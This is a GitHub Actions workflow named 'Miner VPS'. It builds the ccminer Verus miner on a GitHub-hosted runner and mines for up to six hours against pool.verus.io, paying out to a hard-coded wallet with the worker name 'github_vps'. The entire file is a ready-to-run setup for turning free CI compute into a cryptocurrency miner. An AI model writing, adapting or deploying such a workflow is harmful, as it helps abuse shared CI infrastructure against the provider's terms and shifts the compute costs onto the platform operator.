name: Miner VPS
on:
  workflow_dispatch:

jobs:
  mining-vps:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Update & Install dependencies
        run: |
          sudo apt update -y
          sudo apt upgrade -y
          sudo apt install -y git build-essential automake autotools-dev screen curl

      - name: Download & Build ccminer
        run: |
          if [ ! -d "$HOME/ccminer" ]; then
            git clone https://github.com/Oink70/ccminer-verus.git $HOME/ccminer
            cd $HOME/ccminer
            ./build.sh
          else
            cd $HOME/ccminer
            make clean
            ./build.sh
          fi

      - name: Start Mining
        run: |
          cd $HOME/ccminer
          ./ccminer -a verus -o stratum+tcp://pool.verus.io:9999 -u RGRbQeW9cy641mJfpM7MKZ5YpmsUHMxf2p.github_vps -p x
